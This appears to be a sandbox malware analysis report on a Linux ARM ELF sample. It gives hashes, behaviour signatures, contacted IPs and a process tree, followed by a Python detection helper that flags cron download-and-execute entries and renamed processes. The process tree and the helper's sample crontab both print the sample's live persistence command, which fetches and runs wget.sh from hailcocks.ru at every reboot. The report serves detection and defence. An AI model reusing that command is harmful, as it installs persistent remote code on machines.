Analysis

max time kernel: 144s
max time network: 136s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 27-10-2024 02:50

Static task: static1
Behavioral task: behavioral1
Sample: bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
Resource: debian9-armhf-20240611-en
General

Target: bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
Size: 75KB
MD5: 87f114f7f6a5830d45ffe101ccd0de1c
SHA1: 1156d361e2050a882e4b224410682e116575588d
SHA256: bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
SHA512: 1cbf6c2276bd0431b4237f7543ae3ba3eb415df5a2de45558ff5a87d5af95752f2e5406661a210cb2d294de2a8322029d6631af851ea65b2b074fa7a91a95b3b
SSDEEP: 1536:WukDLaSfqMHzfdFM9IMksqL7dX4DgydyDXvW:WukSSfzHrrM9IPjID0W
Malware Config
Signatures

- File and Directory Permissions Modification (1 TTP, 1 IoC)
  Adversaries may modify file or directory permissions to evade defenses.
  IoC: the sh -c command run as PID 645 executes chmod 777 wget.sh on the downloaded script before running it (see the process tree below).

- Renames itself (1 IoC)
  Process: PID 644 bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf

- Unexpected DNS network traffic destination (3 IoCs)
  Traffic on the DNS port to servers other than the sandbox's configured DNS servers was detected.
  Destination IP: 81.169.136.222
  Destination IP: 178.254.22.166
  Destination IP: 51.158.108.203

- Creates/modifies Cron job (1 TTP, 1 IoC)
  Cron allows running tasks on a schedule and is commonly used for malware persistence.
  File opened for modification: /var/spool/cron/crontabs/tmp.ObcLt0 (process: crontab)
  The tmp.* file is the temporary spool file that crontab writes when installing a new table from stdin (crontab -), so this IoC corresponds to the "(crontab -l ; echo ...) | crontab -" command in the process tree, which appends an @reboot entry to the existing user crontab rather than replacing it.

- Changes its process name (1 IoC)
  Changes the process name, possibly in an attempt to hide itself: PID 644 bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf presents itself as "/bin/sh /etc/init.d/rcS"

- Reads runtime system information
  File opened for reading: /proc/filesystems (process: crontab)
  File opened for reading: /proc/filesystems (process: crontab)
  File opened for reading: /proc/mounts (process: bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf)
Processes

/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf  (PID 644)
  command: /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
  - Renames itself
  - Changes its process name
  - Reads runtime system information
  └ /bin/sh  (PID 645)
      command: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      - File and Directory Permissions Modification
      └ /usr/bin/crontab  (PID 648)
          command: crontab -
          - Creates/modifies Cron job
          - Reads runtime system information
      └ /usr/bin/crontab  (PID 649)
          command: crontab -l
          - Reads runtime system information
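The two behaviours worth hunting for on a live host after this tree are the @reboot download-and-execute crontab entry and the renamed process. The following detection helpers are an added example written for this page; they are not sandbox output and not code from the sample. The crontab text is constructed from the command line above (a benign entry plus the line the sample installs), and the process check compares argv[0] from /proc/<pid>/cmdline against the /proc/<pid>/exe target.

```python
"""Detection helpers for the behaviours in the report above: a cron
@reboot download-and-execute entry, and a process whose argv[0] does not
match the binary it was started from.  Added example for this page, not
sandbox output or code from the sample."""
import os
import re
from dataclasses import dataclass, field

# crontab(5) schedule: either an @-shortcut or five whitespace-separated fields
SCHEDULE_RE = re.compile(
    r"^(?:@(?:reboot|yearly|annually|monthly|weekly|daily|midnight|hourly)|(?:\S+\s+){5})"
)
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s\"';]+")
# chmod +x / chmod 7xx style permission changes, or running a file from the cwd
MAKE_EXEC_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
RUN_LOCAL_RE = re.compile(r"(?:^|[;&|\s])\./\S+")
TMP_RE = re.compile(r"\bcd\s+/(?:tmp|var/tmp|dev/shm)\b")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    urls: list = field(default_factory=list)
    reasons: list = field(default_factory=list)


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each job line of a user crontab,
    skipping comments, blank lines and NAME=value environment settings."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:  # e.g. SHELL=/bin/sh, MAILTO=root
            continue
        m = SCHEDULE_RE.match(line)
        if not m:
            continue
        yield n, m.group(0).strip(), line[m.end():].strip()


def find_download_and_execute(text):
    """Return a Finding for every crontab entry that fetches a remote file and
    then makes it executable or runs it.  @reboot and /tmp staging are added
    as extra reasons but are not required on their own."""
    findings = []
    for n, sched, cmd in parse_crontab(text):
        urls = sorted(set(URL_RE.findall(cmd)))
        downloads = bool(DOWNLOADER_RE.search(cmd)) and bool(urls)
        executes = bool(MAKE_EXEC_RE.search(cmd)) or bool(RUN_LOCAL_RE.search(cmd))
        if not (downloads and executes):
            continue
        reasons = ["downloads remote content", "makes it executable or runs it"]
        if sched == "@reboot":
            reasons.append("persists across reboots via @reboot")
        if TMP_RE.search(cmd):
            reasons.append("stages files in a world-writable temp directory")
        findings.append(Finding(n, sched, cmd, urls, reasons))
    return findings


def argv0_mismatch(exe_target, cmdline):
    """True when the name a process presents in argv[0] (/proc/<pid>/cmdline,
    NUL-separated) differs from the binary it actually runs (the target of
    /proc/<pid>/exe).  A hit is a lead, not a verdict: see the usage note."""
    argv0 = cmdline.split(b"\x00", 1)[0].decode(errors="replace")
    return os.path.basename(argv0) != os.path.basename(exe_target)


def scan_proc(proc_root="/proc"):
    """Apply argv0_mismatch to every live process (Linux only; reading
    /proc/<pid>/exe of other users' processes needs root)."""
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        try:
            exe = os.readlink(f"{proc_root}/{pid}/exe")
            with open(f"{proc_root}/{pid}/cmdline", "rb") as f:
                cmdline = f.read()
        except OSError:
            continue
        if cmdline and argv0_mismatch(exe, cmdline):
            hits.append((int(pid), exe, cmdline.split(b"\x00", 1)[0]))
    return hits


# Constructed sample crontab: a benign entry plus the line that the
# "(crontab -l ; echo ...) | crontab -" command in the report installs.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
"""

if __name__ == "__main__":
    for f in find_download_and_execute(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.schedule} -> {f.urls}; {', '.join(f.reasons)}")
    # The renamed process from the report: exe is the ELF, argv[0] claims /bin/sh
    print(argv0_mismatch("/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf",
                         b"/bin/sh\x00/etc/init.d/rcS\x00"))
```

Run the crontab check over `crontab -l -u <user>` output for every user and over /var/spool/cron/crontabs/* directly, since a process can rewrite its own argv[0] but cannot hide what cron has on disk. The argv[0] check is deliberately loose: interpreters and symlinked shells produce legitimate mismatches (on Debian, /bin/sh resolves to dash, so every sh -c child shows argv[0] "sh" against an exe of dash, and login shells present "-bash"), so filter those before treating a hit as masquerading; a mismatch where exe points into /tmp, as here, is the case that matters.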
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 306B
MD5: 156ee72da2df4c852058bb0a4d6a1c57
SHA1: ddcde4860a652c8988f3cf45cb742ae199a5c4fa
SHA256: 22d5d14166a842a855fecf8daa2962429aac0da074dff2c5fd31a157d2e3e3f6
SHA512: 94c14c17c65e0a2c0f1c6cbe79d480ed336c6f79ac4562ba166da7ebf765f8703502bdc8372d5079d818035efe1d7f18c16b0ab94b6e6b155dd9fd77cce78d64